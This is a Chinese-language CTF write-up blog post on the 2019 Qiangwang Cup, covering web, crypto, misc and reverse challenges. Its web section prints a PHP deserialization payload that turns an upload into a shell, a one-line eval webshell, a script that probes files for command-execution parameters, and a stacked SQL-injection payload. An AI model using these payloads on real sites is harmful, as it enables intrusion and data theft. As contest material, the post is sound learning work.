MoR03r MoR03r's Blog
2019强网杯部分题目记录
发表于 2019-5-27 | CTF

Web

0x01 UPLOAD

刚开始没发现有www.tar.gz这个文件,队友提醒以后才下载到,但是看了半天,就知道是反序列话可以执行某些功能函数,实在无招,变开始遍历端口,结果发现了别的队伍大佬上传的shell,连上去看日志,发现了报错位置,然后根据报错过程及报错位置构造如下payload

 <?php

    namespace app\web\controller;
    class Register{
        public $checker;
        public $registed = 0;
        public function __construct($check){
            $this->checker = $check;
        }
    }

    class Profile{
        public $except = array('index'=>'upload_img');
        public $ext = 1;
        public $filename_tmp = "./upload/2e25bf05f23b63a5b1f744933543d723/772fc0ac6b8b485565d303913e96d99c.png";
        public $filename = "./upload/2e25bf05f23b63a5b1f744933543d723/772fc0ac6b8b485565d303913e96d99c.php";
    }
    $a = new Register(new Profile());
    print_r(urlencode(base64_encode(serialize($a))));

生成的字符串将cookie替换后果然报错,访问upload目录即可拿到shell,通过scandir函数发现flag在根目录,然后通过file_get_contents拿到flag

这里我遇到一个坑,每次上传文件都说上传不了,后来看到getimagesize发现,会判断文件大小,可能是这个原因吧,就将原文件末尾的25字节删掉,换成了一句话<?php eval($_GET[cmd]);?>

0x02 高明的黑客

文件太多了,先用grep -r "eval" ./看了一下,发现有很多是传参然后执行的,刚开始用phpinfo作为参数的,但是发现找不到,然后就尝试执行命令,用whoami的话不确定当前用户为www-data还是www,所以就用ls查看目录,当前目录下肯定是有zZW5U1aQRRK.php文件的。查找脚本如下:

 import os
    import re
    import requests
    filenames = os.listdir('src')
    pattern = re.compile(r"\$_POST\[.*\]|\$_GET\[.*\]")
    ptn = re.compile(r"echo.*;");
    ptn1 = re.compile(r"print_r.*;")
    arr = []
    for name in filenames:
        with open('src/'+name,'r') as f:
            data = f.read()

        data = ptn.sub('',data)
        data = ptn1.sub('',data)
        results = pattern.findall(data)
        print(results)
        for i in results:
            try:
                if 'GET' in i:
                    passwd = re.findall(r"\w*",i)[4]
                    print("http://127.0.0.1/src/"+name+"?"+passwd+"=ls")
                    res = requests.get(url="http://127.0.0.1/src/"+name+"?"+passwd+"=ls")
                    if 'zZW5U1aQRRK.php' in res.content:
                        print(name+"\t|\t"+passwd)
                elif 'POST' in i:
                    pay = re.findall(r"\w*",i)
                    res = requests.post(url="http://127.0.0.1/src/"+name,data={passwd:"ls"})
                    if 'zZW5U1aQRRK.php' in res.content:
                                            print('-' * 50)
                        print(name+"\t|\t"+passwd)
            except KeyboardInterrupt:
                exit()

找到后直接ls /看到flag文件,然后cat /flag即可

0x03 随便注

堆叠注入,一次可以执行多条语句

接下来就是构造payload了,卡了很长时间,队友提醒可以修改表名,把放有flag的表名修改为当前查询的表,payload如下:

 ';alter table `1919810931114514` add id int(4) default 1;alter table `1919810931114514` change flag data text;alter table words rename to word;alter table `1919810931114514` rename to words;

执行完成后再查一遍就搞定

0x04 强网先锋-上单

很简单,直接tp5的rce,果然是拼手速的

Crypto

0x05 强网先锋-辅助

rsa的一个公约数分解,直接找个网上脚本一跑就出来了

 import gmpy2
    import libnum

    def gcd(a, b):  
        if a < b:  
            a, b = b, a  
        while b != 0:  
            temp = a % b  
            a = b  
            b = temp  
        return a  

    def getpq(n,e,d):  
            p = 1  
            q = 1  
            while p==1 and q==1:  
                    k = d * e - 1  
                    g = random.randint ( 0 , n )  
                    while p==1 and q==1 and k % 2 == 0:  
                            k /= 2  
                            y = pow(g,k,n)  
                            if y!=1 and gcd(y-1,n)>1:  
                                    p = gcd(y-1,n)  
                                    q = n/p  
            return p,q  

    c1 = 2482083893746618248544426737023750400124543452082436334398504986023501710639402060949106693279462896968839029712099336235976221571564642900240827774719199533124053953157919850838214021934907480633441577316263853011232518392904983028052155862154264401108124968404098823946691811798952747194237290581323868666637357604693015079007555594974245559555518819140844020498487432684946922741232053249894575417796067090655122702306134848220257943297645461477488086804856018323986796999103385565540496534422406390355987976815450744535949785073009043007159496929187184338592859040917546122343981520508220332785862546608841127597
    c2 = 3829060039572042737496679186881067950328956133163629908872348108160129550437697677150599483923925798224328175594483217938833520220087230303470138525970468915511111320396185482564783975435346354440035776909781158407636044986403819840648379609630039348895415045723208843631191252142600667607807479954194447237061080618370787672720344741413537975922184859333432197766580150534457001196765621678659952108010596273244230812327182786329760844037149719587269632133595149294067490955644893402708720284179715002149224068928828656515326446881791228638008572889331511945042911372915003805505412099102954073299010951896955362470

    n1 = 14967030059975114950295399874185047053736587880127990542035765201425779342430662517765063258784685868107066789475747180244711352646469776732938544641583842313791872986357504462184924075227433498631423289187988351475666785190854210389587594975456064984611990461126684301086241532915267311675164190213474245311019623654865937851653532870965423474555348239858021551589650169602439423841160698793338115204238140085738680883313433574060243600028500600824624358473403059597593891412179399165813622512901263380299561019624741488779367019389775786547292065352885007224239581776975892385364446446185642939137287519945974807727
    n2 = 14624662628725820618622370803948630854094687814338334827462870357582795291844925274690253604919535785934208081825425541536057550227048399837243392490762167733083030368221240764693694321150104306044125934201699430146970466657410999261630825931178731857267599750324918610790098952520113593130245010530961350592735239454337631927669542026935873535964487595433984902529960726655481696404006628917922241666148082741874033756970724357470539589848548704573091633917869387239324447730587545472564561496724882799495186768858324490838169123077051890332313671220385830444331578674338014080959653201802476516237464651809255679979

    e = 65537

    q = gcd(n1, n2)
    p = n1/q
    d = gmpy2.invert(e, (p-1)*(q-1))

    print libnum.n2s(pow(c1, d, n1))

flag{i_am_very_sad_233333333333}

0x06 randomstudy

librandomstudy.py文件如下

 import random
    import time
    import subprocess

    def bye():
        print "[+]bye~"
        sys.exit()

    def challenge1():
        print "[+]Generating challenge 1"
        random.seed(int(time.time()))
        for i in range(200):
            recv=int(raw_input("[-]"))
            if recv==random.randint(0,2**64):
                print "[++++++++++++++++]challenge 1 completed[++++++++++++++++]"
                return
            else:
                print "[+]failed"
        bye()


    def challenge2():
        print "[+]Generating challenge 2"
        for i in range(200):
            o = subprocess.check_output(["java", "Main"])
            tmp=[]
            for i in o.split("\n")[0:3]:
                    tmp.append(int(i.strip()))
            v1=tmp[0] % 0xffffffff
            v2=tmp[1] % 0xffffffff
            v3=tmp[2] % 0xffffffff
            print "[-]"+str(v1)
            print "[-]"+str(v2)
            v3_get=int(raw_input("[-]"))
            if v3_get==v3:
                print "[++++++++++++++++]challenge 2 completed[++++++++++++++++]"
                return
            else:
                print "[+]failed"
        bye()

    def challenge3():
        print "[+]Generating challenge 3"
        for i in range(1000):
                a=raw_input("[-]")
                target=random.getrandbits(32)
                if a!=str(target):
                        print "[+]failed:"+str(target)
                else:
                print "[++++++++++++++++]challenge 3 completed[++++++++++++++++]"
                return
        bye()

先过proof,爆破三位的0x00-0xff的所有字符,然后用给的hex解码后的字符串加上爆破的字符串,进行sha256加密即可过proof

Challenge 1

Python的随机数,使用系统时间戳,取秒级别的时间为随机数种子,很简单,直接搞定就行

Challenge 2

Java的随机数,这里网上可以找到脚本,通过给定的前两个随机数,可以推出第三个随机数,直接就可以过

Challenge 3

这里的随机数种子是Challenge 1的,所以直接random.getrandbits(32)得到的随机数就是结果

这里有一个坑点就是最后得到flag的时候一定不要用循环去接收返回值,不然很有可能看不到flag

Misc

0x07 签到

直接复制粘贴

flag{welcome_to_qwb_2019}

0x08 鲲or鳗orGame

打开是cxk的歌?什么鬼

打开游戏,玩儿的很不愉快,就去看js了,发现一个rom/game.gb,丢到链接里发现可以下载

然后用模拟器打开,金手指直接欺骗分数为255,发现一串奇怪的东东,别问我为什么是255,我从300试到256,然后发现255不报错,可能是16位二进制最大的数吧

0x09 强网先锋-打野

又是cxk,这是要搞事情?

下载下来一个bmp的图片,不多逼逼,直接上zsteg拿到flag

Reverse

0x0a 强网先锋-AD

打开后发现函数中存在一连串的变量,且变量值疑似为ascii码值,保存出来转为字符串,然后用base64解密拿到flag

TOP